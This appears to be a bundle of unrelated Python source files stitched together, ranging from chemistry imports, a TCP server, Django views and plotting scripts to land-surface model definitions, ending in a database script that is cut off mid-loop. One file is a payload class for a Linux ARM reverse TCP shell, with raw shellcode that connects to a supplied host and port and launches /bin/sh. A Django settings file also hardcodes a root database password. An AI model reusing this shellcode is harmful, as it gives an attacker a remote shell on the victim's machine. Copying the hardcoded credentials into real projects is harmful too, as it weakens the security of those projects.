'TaskExecution',
'TaskGroup',
'TaskGroupCreateParameter',
'TaskGroupDefinition',
'TaskGroupRevision',
'TaskGroupStep',
'TaskGroupUpdateParameter',
'TaskHubLicenseDetails',
'TaskInputDefinitionBase',
'TaskInputValidation',
'TaskOrchestrationOwner',
'TaskOutputVariable',
'TaskPackageMetadata',
'TaskReference',
'TaskSourceDefinitionBase',
'TaskVersion',
'ValidationItem',
'VariableGroup',
'VariableGroupParameters',
'VariableGroupProviderData',
'VariableValue',
'VirtualMachine',
'VirtualMachineGroup',
'VirtualMachineGroupCreateParameters',
'DataSourceBinding',
'DeploymentGroup',
'DeploymentMachineGroup',
'TaskAgent',
'TaskAgentPool',
'TaskInputDefinition',
'TaskSourceDefinition',
]
|
from .acetyl import Acetyl
from .amino import Amino
from .benzoicacid import Benzoicacid
from .biphenyl import Biphenyl
from .carboxyl import Carboxyl
from .ch3 import Ch3
from .cyano import Cyano
from .cyclopropyl import Cyclopropyl
from .difluoromethyl import Difluoromethyl
from .dihydroxyphenyl import Dihydroxyphenyl
from .ethylene import Ethylene
from .fluorophenyl import Fluorophenyl
from .formyl import Formyl
from .hydroxyl import Hydroxyl
from .isopropyl import Isopropyl
from .isopropylbenzene import Isopropylbenzene
from .methoxy import Methoxy
from .methyl import Methyl
from .nitro import Nitro
from .nitrophenyl import Nitrophenyl
from .pentafluorophenyl import Pentafluorophenyl
from .perfluoromethyl import Perfluoromethyl
from .phenol import Phenol
from .phenyl import Phenyl
from .pyrrole import Pyrrole
from .toluene import Toluene
from .triazole import Triazole |
OUTREACH_API_BASE_URL = "https://api.outreach.io"
OUTREACH_AUTHORIZATION_URL = f"{OUTREACH_API_BASE_URL}/oauth/authorize"
OUTREACH_TOKEN_URL = f"{OUTREACH_API_BASE_URL}/oauth/token"
OUTREACH_API_URL = f"{OUTREACH_API_BASE_URL}/api/v2"
|
import socket
import threading
import struct
import time
import queue
class TcpServer(object):
def __init__(self, host, port):
self.host_ = host
self.port_ = port
self.q_ = queue.Queue()
self.sock_ = None
self.quit_event_ = threading.Event()
def launch(self, server_name="Server"):
print("{} launched at {}:{}".format(server_name, self.host_, self.port_))
self.sock_ = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock_.bind( (self.host_, self.port_) )
self.sock_.listen(1)
with self.q_.mutex:
self.q_.queue.clear()
self.quit_event_.clear()
pthread = threading.Thread(target=self.start_server_)
pthread.start()
def stop(self):
self.quit_event_.set()
self.q_.put(None)
if self.sock_ is not None:
socket.socket(socket.AF_INET, socket.SOCK_STREAM).connect( (self.host_, self.port_))
self.sock_.close()
self.sock_ = None
def fetch_package(self):
while not self.quit_event_.is_set():
content = self.q_.get()
if content is None:
break
yield content
def start_server_(self):
# listen to connection request
while not self.quit_event_.is_set():
# blocked for next connection
conn, addr = self.sock_.accept()
thread = threading.Thread(target=self.handle_connection_, args=(conn, addr))
thread.start()
def handle_connection_(self, conn, addr):
conn_id = "{}:{}".format(addr[0], addr[1])
# print('New connection from {}'.format(conn_id))
while not self.quit_event_.is_set():
pack_size = conn.recv(4)
# end of Connection
if not pack_size:
break
pack_size = struct.unpack('>I', pack_size)[0]
# fetch data package
data = self.recv_all_(conn, pack_size)
self.q_.put(data)
conn.close()
# print("Connection {}: closed".format(conn_id))
def recv_all_(self, sock, msg_length):
data = b""
size_left = msg_length
while len(data) < msg_length and not self.quit_event_.is_set():
recv_data = sock.recv(size_left)
size_left -= len(recv_data)
data += recv_data
return data |
import unittest
from Contains_Duplicate_217 import *
'''
Given an array of integers,
find if the array contains any duplicates.
Example 1:
Input: [1,2,3,1]
Output: true
Example 2:
Input: [1,2,3,4]
Output: false
Example 3:
Input: [1,1,1,3,3,4,3,2,4,2]
Output: true
'''
class Test_Case(unittest.TestCase):
def test_answer_01(self):
nums = [1,2,3,1]
result = True
self.assertEqual(Solution().containsDuplicate(nums), result)
def test_answer_02(self):
nums = [1,2,3,4]
result = False
self.assertEqual(Solution().containsDuplicate(nums), result)
def test_answer_03(self):
nums = [1,1,1,3,3,4,3,2,4,2]
result = True
self.assertEqual(Solution().containsDuplicate(nums), result)
if __name__ == '__main__':
unittest.main()
|
'Nested contexts trees for implementing nested scopes (static or dynamic)'
from collections import MutableMapping
from itertools import chain, imap
class Context(MutableMapping):
''' Nested contexts -- a chain of mapping objects.
c = Context() Create root context
d = c.new_child() Create nested child context. Inherit enable_nonlocal
e = c.new_child() Child of c, independent from d
e.root Root context -- like Python's globals()
e.map Current context dictionary -- like Python's locals()
e.parent Enclosing context chain -- like Python's nonlocals
d['x'] Get first key in the chain of contexts
d['x'] = 1 Set value in current context
del['x'] Delete from current context
list(d) All nested values
k in d Check all nested values
len(d) Number of nested values
d.items() All nested items
Mutations (such as sets and deletes) are restricted to the current context
when "enable_nonlocal" is set to False (the default). So c[k]=v will always
write to self.map, the current context.
But with "enable_nonlocal" set to True, variable in the enclosing contexts
can be mutated. For example, to implement writeable scopes for nonlocals:
nonlocals = c.parent.new_child(enable_nonlocal=True)
nonlocals['y'] = 10 # overwrite existing entry in a nested scope
To emulate Python's globals(), read and write from the the root context:
globals = c.root # look-up the outermost enclosing context
globals['x'] = 10 # assign directly to that context
To implement dynamic scoping (where functions can read their caller's
namespace), pass child contexts as an argument in a function call:
def f(ctx):
ctx.update(x=3, y=5)
g(ctx.new_child())
def g(ctx):
ctx['z'] = 8 # write to local context
print ctx['x'] * 10 + ctx['y'] # read from the caller's context
'''
def __init__(self, enable_nonlocal=False, parent=None):
'Create a new root context'
self.parent = parent
self.enable_nonlocal = enable_nonlocal
self.map = {}
self.maps = [self.map]
if parent is not None:
self.maps += parent.maps
def new_child(self, enable_nonlocal=None):
'Make a child context, inheriting enable_nonlocal unless specified'
enable_nonlocal = self.enable_nonlocal if enable_nonlocal is None else enable_nonlocal
return self.__class__(enable_nonlocal=enable_nonlocal, parent=self)
@property
def root(self):
'Return root context (highest level ancestor)'
return self if self.parent is None else self.parent.root
def __getitem__(self, key):
for m in self.maps:
if key in m:
break
return m[key]
def __setitem__(self, key, value):
if self.enable_nonlocal:
for m in self.maps:
if key in m:
m[key] = value
return
self.map[key] = value
def __delitem__(self, key):
if self.enable_nonlocal:
for m in self.maps:
if key in m:
del m[key]
return
del self.map[key]
def __len__(self, len=len, sum=sum, imap=imap):
return sum(imap(len, self.maps))
def __iter__(self, chain_from_iterable=chain.from_iterable):
return chain_from_iterable(self.maps)
def __contains__(self, key, any=any):
return any(key in m for m in self.maps)
def __repr__(self, repr=repr):
return ' -> '.join(imap(repr, self.maps))
if __name__ == '__main__':
c = Context()
c['a'] = 1
c['b'] = 2
d = c.new_child()
d['c'] = 3
print 'd: ', d
assert repr(d) == "{'c': 3} -> {'a': 1, 'b': 2}"
e = d.new_child()
e['d'] = 4
e['b'] = 5
print 'e: ', e
assert repr(e) == "{'b': 5, 'd': 4} -> {'c': 3} -> {'a': 1, 'b': 2}"
f = d.new_child(enable_nonlocal=True)
f['d'] = 4
f['b'] = 5
print 'f: ', f
assert repr(f) == "{'d': 4} -> {'c': 3} -> {'a': 1, 'b': 5}"
print len(f)
assert len(f) == 4
assert len(list(f)) == 4
assert all(k in f for k in f)
assert f.root == c
# dynanmic scoping example
def f(ctx):
print ctx['a'], 'f: reading "a" from the global context'
print 'f: setting "a" in the global context'
ctx['a'] *= 999
print 'f: reading "b" from globals and setting "c" in locals'
ctx['c'] = ctx['b'] * 50
print 'f: ', ctx
g(ctx.new_child())
print 'f: ', ctx
def g(ctx):
print 'g: setting "d" in the local context'
ctx['d'] = 44
print '''g: setting "c" in f's context'''
ctx['c'] = -1
print 'g: ', ctx
global_context = Context(enable_nonlocal=True)
global_context.update(a=10, b=20)
f(global_context.new_child())
|
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# ============================================================================ #
# Project : Deep Learning for Conversion Rate Prediction (CVR) #
# Version : 0.1.0 #
# File : \shade.py #
# Language : Python 3.7.12 #
# ---------------------------------------------------------------------------- #
# Author : John James #
# Email : [email protected] #
# URL : https://github.com/john-james-ai/cvr #
# ---------------------------------------------------------------------------- #
# Created : Thursday, February 3rd 2022, 6:07:19 pm #
# Modified : Friday, February 4th 2022, 2:42:08 pm #
# Modifier : John James ([email protected]) #
# ---------------------------------------------------------------------------- #
# License : BSD 3-clause "New" or "Revised" License #
# Copyright: (c) 2022 Bryant St. Labs #
# ============================================================================ #
#%%
import holoviews as hv
import numpy as np
import panel as pn
import pandas as pd
from holoviews.operation.datashader import (
dynspread,
datashade,
rasterize,
shade,
)
from holoviews.operation import decimate
import datashader as ds
pn.extension()
N = 1000000
x = np.random.random(N)
y = np.random.random(N)
dset = hv.Dataset(pd.DataFrame({"x": x, "y": y, "z1": x * y, "z2": -x * y}))
pts1 = hv.Points(dset, kdims=["x", "y"], vdims=["z1"])
pts2 = hv.Points(dset, kdims=["x", "y"], vdims=["z2"])
agg1 = ds.mean("z1")
agg2 = ds.mean("z2")
opts = dict(height=800, width=800)
plot1 = datashade(pts1, aggregator=agg1).options(**opts) * decimate(pts1)
plot2 = datashade(pts2, aggregator=agg2).options(**opts) * decimate(pts2)
plots = [("z1", pn.panel(plot1)), ("z2", pn.panel(plot2))]
pn.Tabs(*plots)
|
# flake8: noqa
from .default import *
from .video import *
from .monitors import *
|
from django.shortcuts import render, redirect
from django.utils.crypto import get_random_string
def random_word(request):
""" Displays a random word using get_random_string
Parameters:
- request (django.shortcuts.HttpRequest): the request made to the page
Returns: a rendered page showing a random word
"""
try:
request.session['attempt'] += 1
except:
request.session['attempt'] = 1
context = {
'random_word': get_random_string(length=14),
'attempt': request.session['attempt'],
}
return render(request, 'random_word.html', context)
def reset(request):
""" Resets the number of attemtps
Parameters:
- request (django.shortcuts.HttpRequest): the request made to the page
Returns: redirects to the random word
"""
request.session['attempt'] = 0
return redirect('/random_word') |
DATABASES={
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'bb_annotation',
'USER': 'root',
'PASSWORD': '1234' ,
'HOST': '127.0.0.1',
'PORT': '3306'
}
}
SECRET_KEY = '' |
'''Crie um programa que tenha uma tupla totalmente preenchida com uma contagem por extenso, de zero até vinte.
Seu programa deverá ler um número pelo teclado (entre 0 e 20) e mostrá-lo por extenso.'''
#minha resolução
num_exte = ('zero','um','dois','tres','quatro',
'cinco','seis','sete','oito',
'nove','dez','onze','doze','treze',
'quatorze','quinze','dezesseis',
'dezessete','dezoito','dezenove','vinte')
while True:
num_user = int(input('Digite um número de 0 ate 20 = '))
if 0 <= num_user <= 20:
break
print(f'O número digitado é {num_exte[num_user]}')
#A variavel quem vai acessar a tupla
|
import importlib
from sqlalchemy.orm import sessionmaker, scoped_session
from lib.model import Application
from lib.model.Key import Key
from lib.model.Url import Url
from lib.model.database.Database import Database
from lib.modules.Module import Module
from pathlib import Path
import logging
import glob
import json
class ModuleGeneral(Module):
stop = True
def __init__(self, device, application, plugins):
Module.__init__(self, device, application)
self.plugins = plugins
@staticmethod
def select(path, **kwargs):
logging.debug('ModuleGeneral:select()')
if Path(path).is_file():
return [path]
else:
return glob.glob(f"{path}/*.apk")
def parse(self, message, data):
"""
Parse the message and call the according function
:param message:
:return:
"""
# if data != None:
# print(f"{message} {data}")
# else:
# print(message)
message_json = json.loads(message)
logging.debug("ModuleGeneral:parse()")
for plugin in self.plugins:
plugin.parse(self, message_json, data)
if message_json['plugin'] == "to_string":
message = message_json['string']
if message.startswith("http://") or message.startswith("https://"):
obj = {"plugin": "url", "url" : message, "stack" : '', "req_method" : ""};
self.url(obj)
return
return
if (message_json['plugin'] == 'url'):
self.url(message_json)
return
keys_type = ['key', 'iv', 'Instance']
typeOfMsg = ""
if (message_json['plugin']) in keys_type:
typeOfMsg = message_json['plugin']
self.key(typeOfMsg, data)
return
def url(self, url):
'''
Add an url to the database
:param url:
:return:
'''
logging.debug("ModuleGeneral:url()")
# Create a thread local session
engine = Database.get_engine()
session_factory = sessionmaker(bind=engine)
Session = scoped_session(session_factory)
session = Session()
Session.remove()
url = Url(url)
# Whitelist Google
# whitelist = ['0.0.0.0', '172.', '216.58.']
whitelist = ['0.0.0.0']
add = True
if url.ip is not None:
for i in whitelist:
if url.ip.startswith(i):
add = False
if add:
# Fetch application for this session ( could not use self.application
# because the usage must be thread local )
application = session.query(Application.Application).get(self.application.id)
logging.debug(repr(url))
query = session.query(Url).filter(Url.application_id==self.application.id).filter(Url.scheme==url.scheme).filter(Url.domain==url.domain).filter(Url.uri==url.uri).filter(Url.ip==url.ip).filter(Url.query==url.query).filter(Url.req_method==url.req_method).filter(Url.is_up==url.is_up)
resultQuery = query.all()
if len(resultQuery) == 0:
application.url.append(url)
session.add(url)
session.add(application)
else:
previous_nb = getattr(url, "nb")
setattr(resultQuery[0], "nb", previous_nb+1)
session.commit()
def key(self, typeOfMsg, key):
'''
Add a key to the database
:param type:
:param key:
:return:
'''
# Create a thread local session
engine = Database.get_engine()
session_factory = sessionmaker(bind=engine)
Session = scoped_session(session_factory)
session = Session()
Session.remove()
# Fetch application for this session ( could not use self.application
# because the usage must be thread local )
application = session.query(Application.Application).get(self.application.id)
key = Key(typeOfMsg, key.hex())
logging.debug(repr(key))
query = session.query(Key).filter(Key.application_id==self.application.id).filter(Key.type==key.type).filter(Key.value==key.value)
resultQuery = query.all()
if len(resultQuery) == 0:
application.key.append(key)
session.add(key)
session.add(application)
# else:
# previous_nb = getattr(key, "nb")
# print(previous_nb)
# print(resultQuery[0])
# setattr(resultQuery[0], "nb", previous_nb+1)
# print(getattr(resultQuery[0], "nb"))
session.commit()
|
"""An example of calling a Fortran BMI through Cython."""
import numpy as np
from bmi_heat import Heat
config_file = 'test.cfg'
np.set_printoptions(formatter={'float': '{: 6.1f}'.format})
# Instantiate a model and get its name.
m = Heat()
print(m.get_component_name())
# Initialize the model.
m.initialize(config_file)
# List the model's echange items.
print('Input vars:', m.get_input_var_names())
print('Output vars:', m.get_output_var_names())
# Get time information from the model.
print('Start time:', m.get_start_time())
print('End time:', m.get_end_time())
print('Current time:', m.get_current_time())
print('Time step:', m.get_time_step())
print('Time units:', m.get_time_units())
# Advance the model by one time step.
m.update()
print('Current time:', m.get_current_time())
# Advance the model by a fractional time step.
m.update_frac(0.75)
print('Current time:', m.get_current_time())
# Advance the model until a later time.
m.update_until(10.0)
print('Current time:', m.get_current_time())
# Get the grid_id for the plate_surface__temperature variable.
var_name = 'plate_surface__temperature'
print('Variable {}'.format(var_name))
grid_id = m.get_var_grid(var_name)
print(' - grid id:', grid_id)
# Get grid and variable info for plate_surface__temperature.
print(' - grid type:', m.get_grid_type(grid_id))
grid_rank = m.get_grid_rank(grid_id)
print(' - rank:', grid_rank)
grid_shape = np.empty(grid_rank, dtype=np.int32)
m.get_grid_shape(grid_id, grid_shape)
print(' - shape:', grid_shape)
grid_size = m.get_grid_size(grid_id)
print(' - size:', grid_size)
grid_spacing = np.empty(grid_rank, dtype=np.float64)
m.get_grid_spacing(grid_id, grid_spacing)
print(' - spacing:', grid_spacing)
grid_origin = np.empty(grid_rank, dtype=np.float64)
m.get_grid_origin(grid_id, grid_origin)
print(' - origin:', grid_origin)
print(' - variable type:', m.get_var_type(var_name))
print(' - units:', m.get_var_units(var_name))
print(' - itemsize:', m.get_var_itemsize(var_name))
print(' - nbytes:', m.get_var_nbytes(var_name))
# Get the temperature values.
val = np.empty(grid_shape, dtype=np.float32)
m.get_value(var_name, val)
print(' - values (streamwise):')
print(val)
print(' - values (gridded):')
print(val.reshape(np.roll(grid_shape, 1)))
# Set new temperature values.
new = np.arange(grid_size, dtype=np.float32) # 'real*4 in Fortran
m.set_value(var_name, new)
check = np.empty(grid_shape, dtype=np.float32)
m.get_value(var_name, check)
print(' - new values (set/get, streamwise):');
print(check)
# Get a reference to the temperature values and check that it updates.
print(' - values (by ref, streamwise) at time {}:'.format(m.get_current_time()))
ref = m.get_value_ptr(var_name)
print(ref)
m.update()
print(' - values (by ref, streamwise) at time {}:'.format(m.get_current_time()))
print(ref)
# Get the grid_id for the plate_surface__thermal_diffusivity variable.
var_name = 'plate_surface__thermal_diffusivity'
print('Variable {}'.format(var_name))
grid_id = m.get_var_grid(var_name)
print(' - grid id:', grid_id)
# Get grid and variable info for plate_surface__thermal_diffusivity.
print(' - grid type:', m.get_grid_type(grid_id))
grid_rank = m.get_grid_rank(grid_id)
print(' - rank:', grid_rank)
print(' - size:', m.get_grid_size(grid_id))
grid_x = np.empty(max(grid_rank, 1), dtype=np.float64)
m.get_grid_x(grid_id, grid_x)
print(' - x:', grid_x)
grid_y = np.empty(max(grid_rank, 1), dtype=np.float64)
m.get_grid_y(grid_id, grid_y)
print(' - y:', grid_y)
grid_z = np.empty(max(grid_rank, 1), dtype=np.float64)
m.get_grid_z(grid_id, grid_z)
print(' - z:', grid_z)
grid_connectivity = np.empty(max(grid_rank, 1), dtype=np.int32)
m.get_grid_connectivity(grid_id, grid_connectivity)
print(' - connectivity:', grid_connectivity)
grid_offset = np.empty(max(grid_rank, 1), dtype=np.int32)
m.get_grid_offset(grid_id, grid_offset)
print(' - offset:', grid_offset)
print(' - variable type:', m.get_var_type(var_name))
print(' - units:', m.get_var_units(var_name))
print(' - itemsize:', m.get_var_itemsize(var_name))
print(' - nbytes:', m.get_var_nbytes(var_name))
# Get the diffusivity values.
val = np.empty(1, dtype=np.float32)
m.get_value(var_name, val)
print(' - values:')
print(val)
# Get the grid_id for the model__identification_number variable.
var_name = 'model__identification_number'
print('Variable {}'.format(var_name))
grid_id = m.get_var_grid(var_name)
print(' - grid id:', grid_id)
# Get grid and variable info for model__identification_number.
print(' - grid type:', m.get_grid_type(grid_id))
grid_rank = m.get_grid_rank(grid_id)
print(' - rank:', grid_rank)
print(' - size:', m.get_grid_size(grid_id))
grid_x = np.empty(max(grid_rank, 1), dtype=np.float64)
m.get_grid_x(grid_id, grid_x)
print(' - x:', grid_x)
grid_y = np.empty(max(grid_rank, 1), dtype=np.float64)
m.get_grid_y(grid_id, grid_y)
print(' - y:', grid_y)
grid_z = np.empty(max(grid_rank, 1), dtype=np.float64)
m.get_grid_z(grid_id, grid_z)
print(' - z:', grid_z)
grid_connectivity = np.empty(max(grid_rank, 1), dtype=np.int32)
m.get_grid_connectivity(grid_id, grid_connectivity)
print(' - connectivity:', grid_connectivity)
grid_offset = np.empty(max(grid_rank, 1), dtype=np.int32)
m.get_grid_offset(grid_id, grid_offset)
print(' - offset:', grid_offset)
print(' - variable type:', m.get_var_type(var_name))
print(' - units:', m.get_var_units(var_name))
print(' - itemsize:', m.get_var_itemsize(var_name))
print(' - nbytes:', m.get_var_nbytes(var_name))
# Get the model id.
val = np.empty(1, dtype=np.int32)
m.get_value(var_name, val)
print(' - values:')
print(val)
# Set new model id.
new = np.array(42, dtype=np.intc)
m.set_value(var_name, new)
check = np.empty(1, dtype=np.int32)
m.get_value(var_name, check)
print(' - new values (set/get):');
print(check)
# Finalize the model.
m.finalize()
# Check that number of instances can't exceed N_MODELS=3.
# a = Heat()
# b = Heat()
# c = Heat() # should fail with index=-1
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
File: model_defs.py
Author: naught101
Email: [email protected]
Github: https://github.com/naught101/empirical_lsm
Description: Models created programattically
"""
from collections import OrderedDict
import re
from sklearn.linear_model import LinearRegression
from sklearn.cluster import MiniBatchKMeans
from sklearn.neural_network import MLPRegressor
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import make_pipeline
from empirical_lsm.clusterregression import ModelByCluster
from empirical_lsm.transforms import MissingDataWrapper, LagAverageWrapper, MarkovLagAverageWrapper, Mean
def km_regression(k, model):
return MissingDataWrapper(ModelByCluster(MiniBatchKMeans(k), model))
def km_lin(k):
return km_regression(k, LinearRegression())
def cur_3_var():
var_lags = OrderedDict()
[var_lags.update({v: ['cur']}) for v in ['SWdown', 'Tair', 'RelHum']]
return var_lags
def MLP(*args, **kwargs):
"""Multilayer perceptron """
return MissingDataWrapper(make_pipeline(StandardScaler(), MLPRegressor(*args, **kwargs)))
def get_var_name(v):
fvars = {"S": "SWdown",
"T": "Tair",
"H": "RelHum",
"W": "Wind",
"R": "Rainf",
"L": "LWdown",
"Q": "Qair"}
return fvars[v]
def add_var_lag(var_dict, v, lag='cur'):
if v not in var_dict:
var_dict.update({v: [lag]})
else:
var_dict[v] += [lag]
def parse_model_name(name):
"""parses a standard model name"
"""
name_original = name
var_lags = OrderedDict()
while len(name) > 0:
token = name[0]
name = name[1:]
if token in 'STHWRLQ':
add_var_lag(var_lags, get_var_name(token))
continue
if token == 'd':
v = name[0]
add_var_lag(var_lags, 'delta' + v)
name = name[1:]
continue
elif token == '_':
if name.startswith('lin'): # linear model
model_name = 'lin'
name = name[3:]
continue
elif name.startswith('l'): # lagged var:
match = re.match('l([A-Z])([0-9]*[a-z]*)(M*)', name)
groups = match.groups()
add_var_lag(var_lags, get_var_name(groups[0]), groups[1] + groups[2])
name = name[len(match.group()):]
continue
elif name.startswith('km'): # k means regression
model_name = 'km'
match = re.match('km([0-9]*)', name)
k = int(match.groups()[0])
name = name[len(match.group()):]
continue
elif name.startswith('mean'): # Cluster-mean
model_name = 'mean'
name = name[4:]
continue
elif name.startswith('RF'):
model_name = 'randomforest'
name = name[2:]
continue
elif name.startswith('ET'):
model_name = 'extratrees'
name = name[2:]
continue
elif name.startswith('AB'):
model_name = 'adaboost'
name = name[2:]
continue
elif token == '.': # model duplicate - do nothing
name = name.lstrip('.0123456789')
continue
raise NameError('Unmatched token in name: ' + name)
if model_name == 'lin':
model = MissingDataWrapper(LinearRegression())
desc = 'lin'
elif model_name == 'mean':
model = MissingDataWrapper(Mean())
desc = 'mean'
elif model_name == 'km':
model = km_regression(k, LinearRegression())
desc = 'km' + str(k)
elif model_name == 'randomforest':
from sklearn.ensemble import RandomForestRegressor
model = MissingDataWrapper(RandomForestRegressor(n_estimators=100))
desc = 'RandomForest'
memory_req = 20e9
elif model_name == 'extratrees':
from sklearn.ensemble import ExtraTreesRegressor
model = MissingDataWrapper(ExtraTreesRegressor(n_estimators=100))
desc = 'ExtraTrees'
memory_req = 30e9
elif model_name == 'adaboost':
from sklearn.ensemble import AdaBoostRegressor
model = MissingDataWrapper(AdaBoostRegressor(n_estimators=100))
desc = 'AdaBoost'
memory_req = 20e9
desc = desc + " model with"
if any([l != ['cur'] for l in var_lags.values()]):
model = LagAverageWrapper(var_lags, model)
model.forcing_vars = list(var_lags)
cur_vars = []
lag_vars = []
for k, v in var_lags.items():
if 'cur' in v:
cur_vars += [k]
if len(v) > 0:
for l in v:
if v != 'cur':
lag_vars += ['Lagged ' + k + ' (' + l + ')']
desc += ' with ' + ', '.join(cur_vars)
if len(lag_vars) > 0:
desc += ', ' + ', '.join(lag_vars)
desc += ' (parsed)'
model.description = desc
model.name = name_original
if 'memory_req' in locals():
model.memory_requirement = memory_req
return model
def get_model_from_def(name):
"""returns a scikit-learn style model/pipeline
:name: model name
:returns: scikit-learn style mode/pipeline
"""
# PLUMBER-style benchmarks
if name == '1lin':
model = MissingDataWrapper(LinearRegression())
model.forcing_vars = ['SWdown']
model.description = "PLUMBER-style 1lin (SWdown only)"
elif name == '3km27':
model = km_lin(27)
model.forcing_vars = ['SWdown', 'Tair', 'RelHum']
model.description = "PLUMBER-style 3km27 (SWdown, Tair, RelHum)"
# higher non-linearity
elif name == '3km243':
model = km_lin(243)
model.forcing_vars = ['SWdown', 'Tair', 'RelHum']
model.description = "Like 3km27, but with more clusters"
# All lagged-inputs
elif name == '3km27_lag':
model_dict = {
'variable': ['SWdown', 'Tair', 'RelHum'],
'clusterregression': {
'class': MiniBatchKMeans,
'args': {
'n_clusters': 27}
},
'class': LinearRegression,
'lag': {
'periods': 1,
'freq': 'D'}
}
from .models import get_model_from_dict
model = MissingDataWrapper(get_model_from_dict(model_dict))
model.forcing_vars = ['SWdown', 'Tair', 'RelHum']
model.description = "like 3km27, but includes 1-day lagged versions of all three variables"
# Many variables, lags. Doesn't work very well... (not enough non-linearity?)
elif name == '5km27_lag':
var_lags = OrderedDict()
[var_lags.update({v: ['cur', '2d', '7d']}) for v in ['SWdown', 'Tair', 'RelHum', 'Wind']]
var_lags.update({'Rainf': ['cur', '2d', '7d', '30d', '90d']})
model = LagAverageWrapper(var_lags, km_lin(27))
model.forcing_vars = list(var_lags)
model.description = "km27 linear regression with SW, T, RH, Wind, Rain, and 2 and 7 day lagged-averages for each, plus 30- and 90-day lagged averages for Rainf (probably needs more clusters...)"
# 3km243 with lagged Rainf
elif name == 'STH_lR2d30d_km243':
var_lags = cur_3_var()
var_lags.update({'Rainf': ['2d', '30d']})
model = LagAverageWrapper(var_lags, km_lin(243))
model.forcing_vars = list(var_lags)
model.description = "km243 Linear model with Swdown, Tair, RelHum, and Lagged Rainf (2d,30d)"
# 3km243 with lagged Wind
elif name == 'STH_lW2d30d_km243':
var_lags = cur_3_var()
var_lags.update({'Wind': ['2d', '30d']})
model = LagAverageWrapper(var_lags, km_lin(243))
model.forcing_vars = list(var_lags)
model.description = "km243 Linear model with Swdown, Tair, RelHum, and Lagged Wind (2d,30d)"
# Lagged and non-lagged rainfall
elif name == 'STHR_lR_km243':
var_lags = cur_3_var()
var_lags.update({'Rainf': ['cur', '2d']})
model = LagAverageWrapper(var_lags, km_lin(243))
model.forcing_vars = list(var_lags)
model.description = "km243 Linear model with Swdown, Tair, RelHum, Rainf, and Lagged Rainf (2d)"
# Markov-lagged Qle variants (doesn't seem to be working very well)
elif name == 'STH_lQle30min_km243':
var_lags = cur_3_var()
var_lags.update({'Qle': ['30min']})
model = MarkovLagAverageWrapper(var_lags, km_lin(243))
model.forcing_vars = list(['SWdown', 'Tair', 'RelHum'])
model.description = "km243 Linear model with Swdown, Tair, RelHum, and Markov-Lagged Qle (30min)"
elif name == 'STH_lQle1h_km243':
var_lags = cur_3_var()
var_lags.update({'Qle': ['1h']})
model = MarkovLagAverageWrapper(var_lags, km_lin(243))
model.forcing_vars = list(['SWdown', 'Tair', 'RelHum'])
model.description = "km243 Linear model with Swdown, Tair, RelHum, and Markov-Lagged Qle (1h)"
elif name == 'STH_lQle2d_km243':
var_lags = cur_3_var()
var_lags.update({'Qle': ['2d']})
model = MarkovLagAverageWrapper(var_lags, km_lin(243))
model.forcing_vars = list(['SWdown', 'Tair', 'RelHum'])
model.description = "km243 Linear model with Swdown, Tair, RelHum, and Markov-Lagged Qle (2d)"
# Neural network models
elif name == 'STH_MLP':
var_lags = cur_3_var()
model = LagAverageWrapper(var_lags, MLP((15, 10, 5, 10)))
model.forcing_vars = list(var_lags)
model.description = "Neural-network model with Swdown, Tair, RelHum"
elif name == 'STH_MLP_lR2d':
var_lags = cur_3_var()
var_lags.update({'Rainf': ['2d']})
model = LagAverageWrapper(var_lags, MLP((15, 10, 5, 10)))
model.forcing_vars = list(var_lags)
model.description = "Neural-network model with Swdown, Tair, RelHum, and Lagged Rainf (2d)"
# Named parseable models
elif name == 'short_term243':
model = parse_model_name('STHWdTdQ_lT6hM_km243')
model.name == 'short_term243'
elif name == 'long_term243':
model = parse_model_name('STHWdTdQ_lS30d_lR30d_lH10d_lT6hM_km243')
model.name == 'long_term243'
elif name == 'long_term729':
model = parse_model_name('STHWdTdQ_lS30d_lR30d_lH10d_lT6hM_km729')
model.name == 'long_term729'
else:
raise NameError("unknown model")
return model
|
from lib.payloads.shellcode import Shellcode
class Payload(Shellcode):
Shellcode.info["author"] = "midnitesnake"
Shellcode.info["name"] = "LinuxARM - reverse_tcp shellcode"
Shellcode.info["references"] = [
"http://shell-storm.org/shellcode/files/shellcode-821.php",
]
def __init__(self, **kwargs):
Shellcode.info["payload"] = [
r"\x01\x10\x8F\xE2\x11\xFF\x2F\xE1"
r"\x02\x20\x01\x21\x92\x1a\x0f\x02"
r"\x19\x37\x01\xdf\x06\x1c\x08\xa1"
r"\x10\x22\x02\x37\x01\xdf\x3f\x27"
r"\x02\x21\x30\x1c\x01\xdf\x01\x39\xfb\xd5"
r"\x05\xa0\x92\x1a\x05\xb4\x69\x46"
r"\x0b\x27\x01\xdf\xc0\x46\x02\x00"
+ kwargs["lport"] +
r"\x13\x37"
+ kwargs["host"] +
r"\x2f\x62\x69\x6e\x2f\x73\x68"
]
|
#!/usr/bin/env python
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2011,2013 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Populate location link table with locations links and hop distance.
"""
import os
import sys
BINDIR = os.path.dirname(os.path.realpath(sys.argv[0]))
sys.path.append(os.path.join(BINDIR, "..", "..", "lib", "python2.6"))
import aquilon.aqdb.depends
from aquilon.config import Config
from aquilon.aqdb.model import Base
from aquilon.aqdb.db_factory import DbFactory
db = DbFactory()
LINK_INS = "insert into location_link (child_id,parent_id,distance) values (:cid,:pid,:dist) "
SELECT = """select id,name,parent_id,location_type from location """
Base.metadata.bind = db.engine
session = db.Session()
def get_dict():
""" build a hash of location data keyed on id"""
result = db.engine.execute(SELECT)
ldict = {}
for item in result:
ldict[item[0]] = {'name':item[1], 'pid':item[2], 'type':item[3]}
return ldict
def main():
""" build location links from each location traversing
thru the parent """
ldict = get_dict()
for curr_id in ldict.keys():
child_id = curr_id
child = ldict[curr_id]
print "Processing ", child_id, child
parent_id = child['pid']
dist = 0
while parent_id is not None:
dist = dist +1
parent = ldict[parent_id]
